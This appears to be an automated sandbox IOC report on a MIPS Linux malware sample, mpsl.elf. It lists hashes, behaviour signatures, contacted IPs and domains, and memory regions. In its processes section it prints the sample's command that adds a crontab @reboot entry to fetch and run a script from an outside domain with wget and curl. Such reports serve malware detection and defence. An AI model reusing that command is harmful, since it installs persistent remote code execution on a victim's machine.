Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

mpsl.elf

ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy:	5.5353733629908515
Filename:	mpsl.elf
Filesize:	102572
MD5:	21256c2ed906767ea878798b626bbd96
SHA1:	2eba4ba74f0ab72e1450b9d69e37416acfd6f987
SHA256:	f7f8dd8891b1cfa2703a5b090a8c523a7b22bdd4c87c6793af86e30bc080e2a8
SHA512:	fa4c27d5ea500ba15f404593f5ee9fb3e07d71f5b9cb13722fc99eaee5be8e1d87b5ee5075d57bb4959406257b180864228db9b3443eebe9b38d53375b10de03
SSDEEP:	1536:UHvYMs2ziv1BV7uhsl1zWncjmT9ZtZVm2ZEaoaBEuLC2ZcB7:UHvY100hZjmZZtmj7B7
Preview:	.ELF....................`.@.4...\|.......4. ...(...............@...@...........................E...E.$....[..........Q.td...............................<L..'!......'.......................<(..'!... .........9'.. ........................<...'!...$........g9

Signature Hits	Behavior Group	Mitre Attack
Enumerates processes within the "proc" file system	Persistence and Installation Behavior	OS Credential Dumping
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/var/spool/cron/crontabs/tmp.73SHgw

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.73SHgw
Category:	dropped
Dump:	tmp.73SHgw.19.dr
ID:	dr_0
Target ID:	19
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.137301653713653
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLYoUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8UxeHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/tmp/mpsl.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/mpsl.elf

There are 3 hidden processes, click here to show them.

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	19
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.73SHgw.19.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

kingstonwikkerink.dyn

81.29.149.178

IPs

Domain

Country

Malicious

185.82.200.181

unknown

Netherlands

Details

IP:	185.82.200.181
TargetID:	-1
Country:	Netherlands
Countrycode:	NLD
ASN number:	60117
ASN name:	HSAE
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

88.151.195.22

unknown

Azerbaijan

Details

IP:	88.151.195.22
TargetID:	-1
Country:	Azerbaijan
Countrycode:	AZE
ASN number:	15723
ASN name:	AZERONLINEAZ
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

31.13.248.89

unknown

Bulgaria

Details

IP:	31.13.248.89
TargetID:	-1
Country:	Bulgaria
Countrycode:	BGR
ASN number:	34224
ASN name:	NETERRA-ASBG
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7f71fc000000

page read and write

7f720136c000

page read and write

7f7200194000

page read and write

7f717c45f000

page read and write

7f720167e000

page read and write

558c1a9d8000

page execute and read and write

7f71fc021000

page read and write

7f717c461000

page read and write

7f7200c5a000

page read and write

7f717c45f000

page read and write

7f7201676000

page read and write

7f720154d000

page read and write

7f72016c3000

page read and write

7f717c419000

page execute read

7f7201676000

page read and write

558c1b4cd000

page read and write

7f7200ffb000

page read and write

7f720103b000

page read and write

7f717c459000

page read and write

7f720101e000

page read and write

7fffe97a4000

page execute read

7fffe9717000

page read and write

7fffe97a4000

page execute read

7f72009aa000

page read and write

7f720167e000

page read and write

558c1a9d8000

page execute and read and write

558c1a9ef000

page read and write

558c189d0000

page read and write

7f720099c000

page read and write

7f71fc000000

page read and write

558c189d0000

page read and write

558c189da000

page read and write

7f717c459000

page read and write

558c18748000

page execute read

7f720101e000

page read and write

7f71fc021000

page read and write

558c1b4cd000

page read and write

7f72009aa000

page read and write

558c189da000

page read and write

558c1a9ef000

page read and write

7f720103b000

page read and write

558c1a9d8000

page execute and read and write

7f72016c3000

page read and write

7f71fc021000

page read and write

7f717c45f000

page read and write

7f7200c5a000

page read and write

7f720099c000

page read and write

558c1a9ef000

page read and write

7f7200ffb000

page read and write

7f720099c000

page read and write

7f720154d000

page read and write

7f720167e000

page read and write

7f7200c5a000

page read and write

7f7200194000

page read and write

7fffe9717000

page read and write

7fffe97a4000

page execute read

7f720103b000

page read and write

7f72009aa000

page read and write

7f720136c000

page read and write

7f717c419000

page execute read

7f72016c3000

page read and write

7fffe9717000

page read and write

558c1b4cd000

page read and write

558c18748000

page execute read

558c18748000

page execute read

7f720101e000

page read and write

7f7201676000

page read and write

7f717c459000

page read and write

558c189d0000

page read and write

7f720136c000

page read and write

7f7200194000

page read and write

7f71fc000000

page read and write

7f7200ffb000

page read and write

558c189da000

page read and write

7f717c419000

page execute read

7f720154d000

page read and write

There are 66 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
mpsl.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportmpsl.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
mpsl.elf